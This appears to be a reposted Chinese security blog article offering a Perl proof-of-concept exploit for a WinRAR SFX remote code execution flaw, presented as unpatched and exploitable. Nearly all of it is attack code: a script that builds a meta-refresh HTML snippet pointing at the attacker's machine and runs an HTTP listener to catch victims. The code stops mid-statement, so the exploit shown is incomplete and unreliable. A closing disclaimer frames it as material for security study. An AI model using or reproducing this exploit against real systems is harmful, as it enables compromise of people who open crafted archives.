WinRAR compression tool remote code execution vulnerability PoC

Unpatched and exploitable


PoC: Exploit Code
#!/usr/bin/perl
# Title : WinRaR SFX – Remote Code Execution
# Tested on Windows 7 / Server 2008 / Server 2003
#
# l0s4r.com

use strict;
use warnings;
use IO::Socket;
use MIME::Base64 qw( decode_base64 );
use Socket 'inet_ntoa';
use Sys::Hostname 'hostname';

print " Mohammad Reza Espargham\n\n";
my $ip = inet_ntoa(scalar gethostbyname(hostname() || 'localhost'));

my $port = 80;

print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip .
'"></head></html>'."\n\n" if($port==80);
print "Winrar HTML Code\n".'<html><head><title>poc</title><META http-equiv="refresh" content="0;URL=http://' . $ip .
':' . $port . '"></head></html>'."\n\n" if($port!=80);

my $server = new IO::Socket::INET( Proto => 'tcp',
LocalPort => $port,
Listen => SOMAXCONN,
ReuseAddr => 1)
or die "Unable to create server socket";

# Server loop
while(my $client = $server->accept())
{
my $client_info;
while(<$client>)
{
last if /^\r\n$/;
$client_info .= $_;
}
incoming($client, $client_info);
}

sub incoming
{
print "\n=== Incoming Request:\n";
my $client = shift;
print $c


Copyright notice: unless otherwise noted, this article is an original work by 《颓废》; please retain the source when reposting.

Article link: WinRAR compression tool remote code execution vulnerability PoC - https://www.0dayhack.com/post-681.html

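Important notice: the content of this site comes from the Internet and is intended only for study and research by network security enthusiasts. Please comply with the relevant national laws and regulations while learning. A hacker is not a cracker; hackers safeguard network security.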